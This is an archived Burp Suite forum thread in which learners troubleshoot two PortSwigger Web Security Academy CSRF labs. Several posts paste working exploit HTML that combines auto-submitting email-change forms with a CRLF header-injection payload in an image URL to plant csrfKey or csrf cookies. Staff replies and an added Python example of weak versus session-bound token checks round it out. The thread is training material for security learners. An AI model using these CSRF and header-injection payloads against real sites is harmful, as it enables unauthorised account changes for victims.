The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum


Lab #5: CSRF where token is tied to non-session cookie & Lab #6: CSRF where token is duplicated in cookie issues

LeeSu | Last updated: Oct 11, 2022 05:28PM UTC

Hello,

I have been working on the CSRF Labs and I'm having problems with the following labs:

- Lab #5: CSRF where token is tied to non-session cookie
- Lab #6: CSRF where token is duplicated in cookie issues

For Lab #5, below is what I have tried.

1. Obtained the attacker's (carlos) CSRF key from the cookie header.
2. Obtained the attacker's (carlos) CSRF token from the input parameter.
3. Crafted an HTML page that does the following:
   - Inject the attacker's CSRF key into the victim's (wiener) browser cookie using the HTTP Header Injection method.
   - Submit the email change request with the attacker's CSRF token as the "csrf" parameter value.

And below is the HTML code I made:

```
<html>
  <body>
    <iframe style="display:none;" name="csrf-iframe"></iframe>
    <form method="POST" action="https://0a83008b0376a603c0921073000f00d6.web-security-academy.net/my-account/change-email" id="csrf-form" target="csrf-iframe">
      <input type="hidden" name="email" value="pwned2@evil-user.net" />
      <input type="hidden" name="csrf" value="v84NW8XMbqlYGw4pZ0Dziq3dmVNWCWDP" />
      <input type="submit" name="Submit request" />
    </form>
    <img src="https://0a83008b0376a603c0921073000f00d6.web-security-academy.net/?search=TEST%0D%0ASet-Cookie:%20csrfKey=zgDp4fdQA9P0XHabWg8qL4KcNuJvQoIR" onerror="document.getElementById('csrf-form').submit()">
  </body>
</html>
```

I have also tried this:

```
<html>
  <body>
    <iframe style="display:none;" name="csrf-iframe"></iframe>
    <form method="POST" action="https://0a83008b0376a603c0921073000f00d6.web-security-academy.net/my-account/change-email" id="csrf-form" target="csrf-iframe">
      <input type="hidden" name="email" value="pwned2@evil-user.net" />
      <input type="hidden" name="csrf" value="v84NW8XMbqlYGw4pZ0Dziq3dmVNWCWDP" />
      <input type="submit" name="Submit request" />
    </form>
    <img src="https://0a83008b0376a603c0921073000f00d6.web-security-academy.net/?search=TEST%0D%0ASet-Cookie:%20csrfKey=zgDp4fdQA9P0XHabWg8qL4KcNuJvQoIR" onerror="document.forms[0].submit()">
  </body>
</html>
```

And upon delivering both exploits using the exploit server, I don't get any success message for the lab and it remains unsolved. The victim's email does get changed when I submit the request with the attacker's CSRF key and token using Burp Repeater. I have followed the YouTube instruction but it still didn't get solved. When I view the exploit it says "Invalid CSRF Token". I don't understand how it can be, as I have checked that I am using a fresh CSRF token and key from the attacker (carlos).

For Lab #6, below is what I have tried.

```
<html>
  <body>
    <iframe style="display:none;" name="csrf-iframe"></iframe>
    <form method="POST" action="https://0a3100b904c9da75c0386aad006b00b0.web-security-academy.net/my-account/change-email" id="csrf-form" target="csrf-iframe">
      <input type="hidden" name="email" value="pwned1@evil-user.net" />
      <input type="hidden" name="csrf" value="v84NW8XMbqlYGw4pZ0Dziq3dmVNWCWDP" />
    </form>
    <img src="https://0a3100b904c9da75c0386aad006b00b0.web-security-academy.net/?search=TEST%0D%0ASet-Cookie:%20csrf=v84NW8XMbqlYGw4pZ0Dziq3dmVNWCWDP" onerror="document.getElementById('csrf-form').submit()">
  </body>
</html>
```

This also doesn't work using the exploit server, but it works when using Burp Repeater. I also have checked that the csrf token gets successfully injected into the cookie header with this input "TEST%0D%0ASet-Cookie:%20csrf=v84NW8XMbqlYGw4pZ0Dziq3dmVNWCWDP" on the search function using Burp Repeater.

Can you spot what the issue is with my exploits?

Thank you!

Michelle, PortSwigger Agent | Last updated: Oct 12, 2022 09:18AM UTC

Thanks for your message.

There has been a recent change to the exploit server, so the $cookie-injection-url needs to include SameSite=None for these two labs, for example:

```
https://<your-lab-id>/?search=test%0d%0aSet-Cookie:%20csrf=fake;%20SameSite=None
```

We'll be updating the solutions soon.

LeeSu | Last updated: Oct 17, 2022 05:54PM UTC

Thank you for the reply, I was able to solve the labs following your instruction. Much appreciated.
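
Added example, not part of the thread and not PortSwigger's lab code: the two token checks these labs are named after, written in Python next to a check that binds the token to the session cookie, plus a CR/LF guard for values reflected into response headers. The function names, the `session` cookie name and the sample values are assumptions; `csrfKey` and `csrf` are the names used in the posts above.

```python
import hashlib
import hmac
import secrets

SERVER_SECRET = secrets.token_bytes(32)  # assumed per-deployment secret
KEY_TO_TOKEN = {}  # csrfKey -> token; one pool for every user (Lab #5 pattern)

def _eq(a, b):
    return hmac.compare_digest(a.encode(), b.encode())

def issue_keyed_pair():
    """Issue a csrfKey cookie value and the token that matches it."""
    key, token = secrets.token_urlsafe(16), secrets.token_urlsafe(16)
    KEY_TO_TOKEN[key] = token
    return key, token

def check_keyed(cookies, form):
    """Lab #5 pattern: token is tied to the csrfKey cookie, not to the session."""
    expected = KEY_TO_TOKEN.get(cookies.get("csrfKey", ""))
    return expected is not None and _eq(expected, form.get("csrf", ""))

def check_double_submit(cookies, form):
    """Lab #6 pattern: only compares the csrf cookie with the csrf form field."""
    cookie = cookies.get("csrf", "")
    return cookie != "" and _eq(cookie, form.get("csrf", ""))

def issue_bound_token(session_id):
    """Hardened: the token is an HMAC over the session id."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()

def check_bound(cookies, form):
    """Hardened: recompute from the session cookie; other cookies are ignored."""
    session_id = cookies.get("session", "")
    return session_id != "" and _eq(issue_bound_token(session_id), form.get("csrf", ""))

def header_safe(value):
    """Refuse CR/LF in anything reflected into a response header."""
    if "\r" in value or "\n" in value:
        raise ValueError("CR/LF in header value")
    return value

if __name__ == "__main__":
    # Constructed request: a session whose csrfKey cookie was overwritten with
    # a key issued to a different user, plus that user's token in the form.
    key, token = issue_keyed_pair()
    cookies = {"session": "sess-A", "csrfKey": key, "csrf": "fake"}
    print(check_keyed(cookies, {"csrf": token}))           # weak check
    print(check_double_submit(cookies, {"csrf": "fake"}))  # weak check
    print(check_bound(cookies, {"csrf": token}))           # hardened check
```

The two weak checks accept the constructed request because nothing in them refers to the session; the bound check rejects it, and `header_safe` removes the cookie-setting primitive the weak checks depend on.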

BirD | Last updated: Mar 18, 2024 09:18AM UTC

I followed the steps in the video closely, but the email address was still not modified successfully ("Invalid CSRF token"). But submitting the same POC got "Congratulations, you solved the lab!".

For Lab #6, below is what I have tried.

```
<html>
  <body>
    <form method="POST" action="https://0a7e00bc0330803380f10d9c00a10045.web-security-academy.net/my-account/change-email" id="csrf-form" target="csrf-iframe">
      <input type="hidden" name="email" value="pwned2@evil-user.net" />
      <input type="hidden" name="csrf" value="pIoHy5hQ3urDP85gNtiopg0nFd52a3uf" />
      <input type="submit" name="Submit request" />
    </form>
    <img src="https://0a7e00bc0330803380f10d9c00a10045.web-security-academy.net/?search=hat%0d%0aSet-Cookie%3a%20csrfKey=A9PU4tHQsloOMnhGwNd6Kw3Eg62DsNEH%3b%20SameSite=None" onerror="document.forms[0].submit()">
  </body>
</html>
```

Michelle, PortSwigger Agent | Last updated: Mar 18, 2024 01:29PM UTC

Hi,

When testing this on yourself, did you have the csrf token in the form set to your CSRF token and the csrfKey in the img src link set to fake? When you then deliver this to the victim, did you set both values to fake?

Mario | Last updated: Jun 13, 2024 09:35PM UTC

Hello,

I have encountered an issue with the CSRF lab where the token is tied to a non-session cookie. I followed all the steps, but I am unsure if the problem lies with the browser (Burp's Chromium). I have two users, Wiener and Carlos. From Wiener, I obtain the two CSRF tokens. I then place them in the exploit server:

```
<form method="POST" action="https://0abc0008040bb9448762670c0028001f.web-security-academy.net/my-account/change-email">
  <input type="hidden" name="email" value="unmail777@mail.com">
  <input type="hidden" name="csrf" value="ktw3B3EXEwad9rgv4TlvZrQZ9gONdepf">
</form>
<img src="https://0abc0008040bb9448762670c0028001f.web-security-academy.net/?search=test%0d%0aSet-Cookie:%20csrfKey=fGryYqHpou8b36uI8SkXKqCDCuQIxXGb%3b%20SameSite=None" onerror="document.forms[0].submit()">
```

After setting this up, I click on "store", copy the exploit link, and paste it into the browser where I have the user Carlos (my victim) logged in. Sometimes I open a new tab, and sometimes I stay in the same tab where I intend to change the email. When I submit the request, I get an invalid CSRF token error.

I intercepted the request to see what was happening. The search is successful and sets the token, but when the POST request to change the email is made, the CSRFKey is still associated with Carlos' session instead of Wiener's. Is this issue related to the browser?

Hannah, PortSwigger Agent | Last updated: Jun 17, 2024 10:39AM UTC

I've tested this lab and can confirm that it is working as expected. Have you tried encoding any special characters to see if that makes a difference? For example, for your email value, use something like "asdf&#64;asdf&#46;asdf". Please also ensure that the email address you use in your exploit is unique and has not already been used in the lab. Additionally, you may want to verify that your CSRF token is up-to-date, so you could try refreshing your original session and verifying that the CSRF token is still the same.

david | Last updated: Jul 02, 2024 08:26AM UTC

BirD's exploit is working but I can't understand why (when I viewed the exploit it shows "invalid token", but when delivered to the victim the lab is solved).

I followed the steps in the video closely, but the email address was still not modified successfully ("Invalid CSRF token"). But submitting the same POC got "Congratulations, you solved the lab!".

For Lab #6, below is what I have tried.

```
<html>
  <body>
    <form method="POST" action="https://0a7e00bc0330803380f10d9c00a10045.web-security-academy.net/my-account/change-email" id="csrf-form" target="csrf-iframe">
      <input type="hidden" name="email" value="pwned2@evil-user.net" />
      <input type="hidden" name="csrf" value="pIoHy5hQ3urDP85gNtiopg0nFd52a3uf" />
      <input type="submit" name="Submit request" />
    </form>
    <img src="https://0a7e00bc0330803380f10d9c00a10045.web-security-academy.net/?search=hat%0d%0aSet-Cookie%3a%20csrfKey=A9PU4tHQsloOMnhGwNd6Kw3Eg62DsNEH%3b%20SameSite=None" onerror="document.forms[0].submit()">
  </body>
</html>
```

Carson | Last updated: Jul 10, 2024 09:16PM UTC

The issue from Lab 5 still exists. I've followed many guides and it always gives "Invalid CSRF token" no matter how new it is, unused, have SameSite=None, encoded various symbols. I think internally lab might be broken.

Carson | Last updated: Jul 10, 2024 09:17PM UTC

Works when I try in browser then when I enter new CSRF token to send to victim it says Invalid CSRF. Accepts it from own browser each time.

Carson | Last updated: Jul 10, 2024 09:20PM UTC

Issue fixed after trying again with new CSRF token/cookie from Carlos, I did try this step prior but it didn't work, I do think lab can be a bit hard to work with.

Carlos | Last updated: Aug 31, 2024 07:50AM UTC

Hi guys,

When I tried to deliver the exploit to the victim, it doesn't work:

```
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="https://0ad3001e0446f5068044c1d400e70006.web-security-academy.net/my-account/change-email" method="POST">
      <input type="hidden" name="email" value="exploit2&#64;exploit&#46;es" />
      <input type="hidden" name="csrf" value="v0YbX3UYXZZsGIZKxlefoU2hIpjx9S9Y" />
      <input type="submit" value="Submit request" />
    </form>
    <img src="https://0ad3001e0446f5068044c1d400e70006.web-security-academy.net/?search=test%0d%0aSet-Cookie:%20csrfKey=kqh3URu7iKmUIwcW6bzpntaRa0qasdGN%3b%20SameSite=None" onerror="document.forms[0].submit()">
  </body>
</html>
```

But if I try it with the "View Exploit" function, it works. Why?

Michelle, PortSwigger Agent | Last updated: Sep 02, 2024 08:20AM UTC

Hi,

Can you confirm which of the CSRF labs you are working on, please? Is it 'CSRF where token is tied to non-session cookie' or 'CSRF where token is duplicated in cookie'?

kd4sh | Last updated: Sep 12, 2024 05:22PM UTC

Hi,

LAB: CSRF where token is tied to non-session cookie

I generated a PoC with Burp from the changing email request in wiener's account (victim), I logged in in a separate browser to carlos' account, got the CSRF token and csrfKey, put the token in the form's input and the csrfKey in the <img src's value. When I test it with view exploit, it works; when I deliver it, it doesn't. I lost a couple of hours on this, which should be done in ~10 minutes. Please find below my solution:

Solution:

```
<html>
  <body>
    <form action="https://0a310074047128768015ad38009d005e.web-security-academy.net/my-account/change-email" method="POST">
      <input type="hidden" name="email" value="testemail&#64;email&#46;com" />
      <input type="hidden" name="csrf" value="2WkWdCOfhOXllyzK6UKx24cMW0ONq9YD" />
      <input type="submit" value="Submit request" />
    </form>
    <img src="https://0a310074047128768015ad38009d005e.web-security-academy.net/?search=abc%0d%0aSet-Cookie:%20csrfKey=epgU0dIsOMzob7Yoo4xxSFqMPwsB46sO%3b%20SameSite=None" onerror="document.forms[0].submit()">
  </body>
</html>
```

I also tried different variations written by myself that should have worked.

Michelle, PortSwigger Agent | Last updated: Sep 13, 2024 07:55AM UTC

Hi,

After testing it with 'View exploit', did you then change the email address used in your solution before delivering it to the victim?

kd4sh | Last updated: Sep 13, 2024 08:42AM UTC

Hi, Yes, I did not forget about that.

Michelle, PortSwigger Agent | Last updated: Sep 13, 2024 10:50AM UTC

I've just tested using the solution you posted above (changing the lab ID and CSRF details) and after clicking 'Deliver exploit to victim', the lab showed as solved. Can you give this another try?

kd4sh | Last updated: Sep 13, 2024 11:30AM UTC